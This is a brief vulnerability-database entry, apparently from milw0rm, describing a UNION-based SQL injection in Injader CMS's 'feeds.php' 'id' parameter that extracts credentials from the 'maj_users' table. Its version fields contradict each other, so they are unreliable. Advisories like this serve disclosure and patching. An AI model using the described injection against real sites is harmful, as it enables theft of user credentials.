SQL Injection
Vendor: Injader CMS
By: milw0rm.com
CVSS: 7.5 HIGH
CWE: 89
Product Name: Injader CMS
Affected Version From: 2.1.2001
Affected Version To: 2.1.2001
Patch Exists: YES
Related CWE: N/A
CPE: a:injader:injader_cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008
Injader CMS
Injader CMS 2.1.1 is vulnerable to SQL injection through the 'id' parameter of the 'feeds.php' script. An attacker can exploit it by sending a specially crafted HTTP request to the vulnerable server, using the UNION operator to extract data from the database and the CONCAT() function to extract the username and password from the 'maj_users' table.
Mitigation:
Upgrade to Injader CMS 2.1.2 or later.